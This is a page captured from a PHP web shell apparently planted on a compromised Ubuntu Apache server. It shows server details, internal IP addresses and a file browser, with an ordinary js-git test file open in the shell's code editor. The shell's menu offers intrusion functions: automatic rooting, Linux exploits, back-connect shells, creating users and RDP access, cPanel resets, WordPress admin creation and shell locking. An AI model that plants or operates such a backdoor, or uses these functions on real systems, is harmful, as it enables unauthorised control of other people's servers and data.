Linux websever 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 192.168.3.70 | : 192.168.1.99
Cant Read [ /etc/named.conf ]
8.1.2-1ubuntu2.23
urlab
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
events /
node_modules /
js-git /
test /
[ HOME SHELL ]
Name
Size
Permission
Action
run.js
1.13
KB
-rw-rw-r--
sample-pack.js
1.95
KB
-rw-rw-r--
test-config-codec.js
1.6
KB
-rw-rw-r--
test-mem-db.js
1.65
KB
-rw-rw-r--
test-object-codec.js
6.94
KB
-rw-rw-r--
test-pack-codec.js
2.62
KB
-rw-rw-r--
test-pack-ops.js
1.17
KB
-rw-rw-r--
test-zlib.js
1.21
KB
-rw-rw-r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : test-pack-ops.js
var run = require('./run.js'); var repo = {}; require('../mixins/mem-db.js')(repo); var pack = require('./sample-pack.js'); var hashes; run([ function setup() { require('../mixins/pack-ops.js')(repo); }, function testUnpack(end) { repo.unpack(singleStream(pack), { onProgress: onProgress }, function (err, result) { if (err) return end(err); hashes = result; if (hashes.length !== 16) { return end(new Error("Wrong number of objects unpacked")); } end(); }); function onProgress(progress) { // console.log(progress); } }, function testPack(end) { var stream; var parts = []; repo.pack(hashes, {}, function (err, result) { if (err) return end(err); stream = result; stream.take(onRead); }); function onRead(err, chunk) { if (err) return end(err); // console.log(chunk); if (chunk) { parts.push(chunk); return stream.take(onRead); } end(); } } ]); function singleStream(item) { var done = false; return { take: function (callback) { if (done) return callback(); done = true; callback(null, item); }}; }
Close